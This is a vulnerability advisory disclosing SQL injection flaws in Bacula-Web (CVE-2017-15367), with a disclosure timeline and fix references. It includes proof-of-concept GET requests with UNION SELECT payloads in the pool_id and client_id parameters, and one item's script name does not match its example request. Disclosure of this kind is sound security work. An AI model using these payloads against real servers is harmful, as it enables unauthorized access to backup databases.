[FD] Multiple SQL injection vulnerabilities in Bacula-Web (CVE-2017-15367)

Title: Multiple SQL injection vulnerabilities in Bacula-Web (CVE-2017-15367) Credit: Gustavo Sorondo / http://ift.tt/2tvmReT Vendor/Product: Bacula-Web (http://bacula-web.org/) Vulnerability: SQL injection Vulnerable version: All prior to 8.0.0-RC2. Fixed in: 8.0.0-RC2 CVE: CVE-2017-15367 ## Vulnerability Details Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection vulnerabilities that could allow an attacker to access the Bacula database and, depending on configuration, escalate privileges on the server. 1) The /jobs.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of "select @@version" query. Request: GET /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 Response: HTTP/1.1 200 OK [...]

5.7.19-0ubuntu0.16.04.1

backupjob-report.php?backupjob_name= [...] Other parameters (eg. client_id) are also vulnerable, since there is no protection against SQL Injections at all. 2) The /backupjob-report.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of "select @@version" query. Request: GET /client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23 3) The /client-report.php is affected by a SQL Injection vulnerability in the "client_id" parameter. ## Vulnerability Disclosure Timeline 2017-08-01 - Vulnerabilities discovered by Cinta Infinita 2017-08-09 - Vulnerabilities reported to Bacula-Web 2017-08-09 - Vulnerabilities confirmed by Bacula-Web 2017-10-15 - CVE-2017-15367 is assigned 2017-10-16 - Bacula-Web fixes backupjob-report.php and client-report.php in dev branch 2018-03-02 - Bacula-Web fixes jobs.php in dev branch 2018-03-02 - Version 8.0.0-RC2 is published 2018-03-07 - Full disclosure ## Related fixes and releases http://ift.tt/2oXQT6l http://ift.tt/2Hk6fbV http://ift.tt/2oZ5Yo4 ## About Cinta Infinita Cinta Infinita offers Information Security related services. Our Headquarters are in Buenos Aires, Argentina. For more information, visit http://ift.tt/2tu3iUd Source: Gmail -> IFTTT-> Blogger